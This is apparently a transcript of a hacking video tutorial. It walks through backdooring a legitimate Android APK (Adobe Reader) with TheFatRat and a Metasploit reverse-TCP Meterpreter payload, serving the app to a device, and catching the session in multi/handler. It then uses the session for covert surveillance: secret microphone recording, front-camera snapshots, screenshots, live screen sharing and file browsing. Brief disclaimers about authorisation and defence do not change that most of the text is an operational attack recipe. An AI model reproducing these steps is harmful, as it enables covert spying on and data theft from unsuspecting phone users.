Let's begin with opening the terminal and gaining root privileges by typing sudo su, then entering your password. After that, run the command fatrat, and you can see fatrat is opening. Press enter and continue whenever it asks. Now we are on the main menu of the fatrat. Here, in the previous section, we selected the first option, which is Create Backdoor with MSF Venom, but in this video, we will not use this option. Instead, we will use the fifth option, which is Backdooring Original APK. To use this, type 5 and press Enter. Now you can see that it is asking to set the local host. In the previous section, we used ngrok to work over the internet. But in this section, we'll go with a simpler flow to explain the process. So copy the local host provided above and paste it here. Now it is asking for the L port. Type 4444 here and press Enter. We're using this port because it's commonly available and not typically blocked by firewalls, making it ideal for establishing our connection. Now here is the main part. It is asking to provide the path for the legitimate app in which we will inject the payload. Be careful. I recommend you not use any app without permission. For demonstration and testing purposes only, use those apps that are provided for security testing and experiments. The question is, where do we find that app? It's not hard. fatrat provides some testing apps that you can use for testing purposes. Here we have to copy the path of the app in which we want to inject our payload. So open the Kali home folder and go to the fatrat directory. Here you can see a folder for APKs. Open it. Now here we have two more folders. Open the first folder, and here you can see two apps are available for testing purposes. First is Adobe Reader, and second is WhatsApp. We will use Adobe Reader for our demonstration. To copy the path, you can right-click and copy the path from Properties, or you can first click the app and press F2 for the app name, copy it, and then paste it in front of the folder address. Now copy the complete address. When copied, go back to the fatrat terminal and paste it here, then press Enter. Now you can see that fatrat is testing the app to see if it's suitable for payload injection. When the test is completed, you can see it's showing different types of payloads that we can inject into the app. We will use reverse TCP to establish a connection back to our machine when the victim opens the app. To use it, enter 3 and click Enter. Now it is showing 3 more options that are actually different methods for injecting the payload. First is Use Backdoor APK 0.2.4a, which is a specialized tool for backdooring Android applications that preserves the original app's functionality. Second is Use Old fatrat method, which is a legacy approach that might work better on older Android versions. And third is Use MSF Venom embedded method, which directly embeds our payload using the Metasploit framework's tools. We will use the third one. Enter 3 and press Enter. Now the process is started, but here you can see an error occurred stating that APK tool 2.60 is installed, but we need at least version 2.92. So let's set up our environment accordingly. If you don't face this error, you can skip this process. To download the correct version of APK tool, open your web browser and search for APK tool. Here you can see the first official link, and below this, there is an install guide mentioned. Click the link, and you will be redirected to the install guide page. Scroll down to the Linux section and click to download the latest version of the APK tool. Now here you can see different versions, and we need at least 2.9.2. Click it to download it. After some time it will be downloaded. Open the Downloads folder and you can see it is here. Now open the Home Kali and the FatRat folder. In this, you can see the Tools folder. Open it, and inside it, you can find the APK tool folder. Open it. Here you can see that 3 files are present. First is the APK tool wrapper. We don't need to do anything with it. Second is the APK tool old version. We need to replace it with the latest version. To do this, first of all delete this, and copy the downloaded file and paste it here. Now click F2 to change the name and make it accordingly. Remove the version part from the file, and it will become apktool.jar. Now we have to change the version file. Open it, and you can see 2.60 is written. Change it to 2.92, save it, and close it. Now open a new terminal and type the command apktool-version, and you can see that the updated version is here. Now here we need to install another tool, which is APK Signer. This tool is used to sign the app files after modification, which is necessary for Android to recognize and install them. To install it, type the command sudo apt install apk signer, enter your Kali password, and then type Y to continue to install. Now everything is done, and we will move to the FatRat process again. Now we're at the point where we previously faced the error. You can see the backdooring process has started. This will take some time. During this process, FatRat is decompiling the legitimate app, injecting our malicious code into it, and then recompiling everything while preserving the app's original functionality. This approach is more complex than creating a standalone malicious app because it needs to ensure the original app still works normally while our backdoor runs silently in the background. When the process completes, we'll return to the menu. Next, let's open the folder where FatRat saved the app file. In our previous section, we set the save location to the Documents folder, so let's check there. Open the Documents folder, and you'll see a file named app backdoored.apk. This is our malicious app. Now we need to transfer it to our testing Android device. Let's repeat the same process we did in the previous section. Open a new terminal in the Documents folder and run the command python3-m/http.server90. Now open the browser on your testing device and enter the IP address of your Kali machine with port 90. You can see the backdoored app is available here. Click it to download it. Open the downloads and tap on the file to install it. Click the Install button. Once installation completes, click Done. We'll open the app after setting up the MSF Venom listener. Now that our malicious app is installed on the target device, we need to set up our listener to receive the connection when the app is opened. Let's open a new Kali Linux terminal and gain root privileges. Type MSF console to launch the Metasploit framework. This might take a moment to load. Once Metasploit loads, we need to configure our handler. Type use exploit/multi/handler and press enter. This module handles incoming connections from our payload. Next, we need to set our payload to match what we used in FatRat. Type set payload android/meterpreter/reverse TCP and press enter. Let's check what options we need to configure. Type Options and press Enter. You'll see that lhost isn't set yet, but lport is already set to 4444, the same port we specified earlier. To set lhost, type set lhost, followed by your Kali machine's IP address. Now comes the exciting part. Type Run and press Enter. This starts our handler, which will wait for the target device to connect. Switch to your Android device and open the Adobe Reader app that we modified. Watch your Metasploit console closely. Within moments, you should see a message indicating that a MetaSploit session has been established. This means we now have a connection to the target device. What makes this attack particularly dangerous is that the Adobe Reader app appears to function normally to the user. They can still use it to read PDFs, while our backdoor is running silently in the background. Let's explore what we can do with this connection. First, at the MetaSploit prompt, type sysinfo and press Enter. This command gives us detailed information about the compromised device, including its Android version, hardware details, and architecture. This is crucial information that attackers use to determine which exploits might work against the target device. Next, let's try one of the most invasive capabilities, audio recording. Type record mic-D10 and press Enter. This records 10 seconds of audio through the device's microphone and saves it to your attacking machine. The victim would have absolutely no indication that their conversations are being recorded. This could be used to capture sensitive discussions, personal conversations, or even passwords spoken aloud. Now, let's check what cameras are available on the device. Type webcam list and press Enter. You'll see a list of available cameras on the device. Typically, both front and back cameras are listed. Each camera has an index number assigned to it. Let's take a photo using the front-facing camera without the victim knowing. Type webcam snap-I2 and press Enter. The number after I specifies which camera to use, in this case, camera index 2, which is typically the front camera. This captures a photo using the selected camera and saves it to your attacking machine. Think about the privacy implications of this. An attacker could secretly take photos of the victim or their surroundings. We can even capture what's on the screen. Type screenshot and press Enter. This takes a screenshot of whatever is currently displayed on the victim's device and saves it to your machine. This could be used to capture sensitive information like banking details, private messages, or passwords. For continuous monitoring, we can use Screen Share, which gives us a live feed of the victim's screen. Type Screen Share and press Enter. Now you can see everything they're doing on their device in real time. We can also explore the complete file system of the device. Using these basic Linux commands, you can access photos, documents, downloads, and other sensitive files stored on the victim's device. Now let me be very clear. All of these capabilities I've just demonstrated are why mobile security is so crucial. The fact that we've disguised our malicious code inside what appears to be a legitimate app makes this attack vector particularly dangerous. Most users wouldn't think twice about installing a PDF reader app, especially if it came from what appeared to be a legitimate source. The knowledge we've shared today carries great responsibility. Use it to protect yourself and others, never for malicious purposes. Understanding these attacks is crucial for defense, but implementing them without authorization is illegal and unethical. If you found this information valuable, smash that like button, subscribe, and hit the notification bell to stay updated with our latest security insights. Share this video with anyone you care about. Knowledge is our best defense against cyber threats.